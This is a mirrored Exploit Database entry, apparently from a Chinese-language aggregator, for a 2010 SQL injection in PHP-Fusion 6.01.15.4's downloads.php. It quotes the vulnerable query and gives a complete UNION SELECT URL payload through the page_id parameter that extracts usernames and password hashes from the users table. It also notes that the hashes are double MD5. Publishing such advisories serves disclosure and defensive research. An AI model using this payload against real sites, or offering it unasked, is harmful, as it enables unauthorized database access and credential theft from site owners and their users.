PHP-Fusion 6.01.15.4 – ‘downloads.php’ SQL Injection

• Exploit Database
• 114 阅读

• 作者： Inj3ct0r
  日期： 2010-03-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11726/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

  =================================================================== PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability =================================================================== #[+] Discovered By : Inj3ct0r #[+] Site: Inj3ct0r.com #[+] support e-mail: submit[at]inj3ct0r.com     Product: PHP-Fusion Version: 6.01.15.4   Error in file downloads.php   PHP code:   $result = dbquery("SELECT * FROM ".$db_prefix."downloads WHERE download_id=&apos;$page_id&apos;");   A vulnerable parameter $ page_id     Exploit:   downloads.php?page_id=-1%27+union+select+1,2,user_name,4,user_password,6,7,8,9,10,11,12,13,14,15,16,17+from+rusfusion_users+limit+0,1/*   password is encrypted by: md5 (md5 ($ pass))     # ~- [ [ : Inj3ct0r : ] ]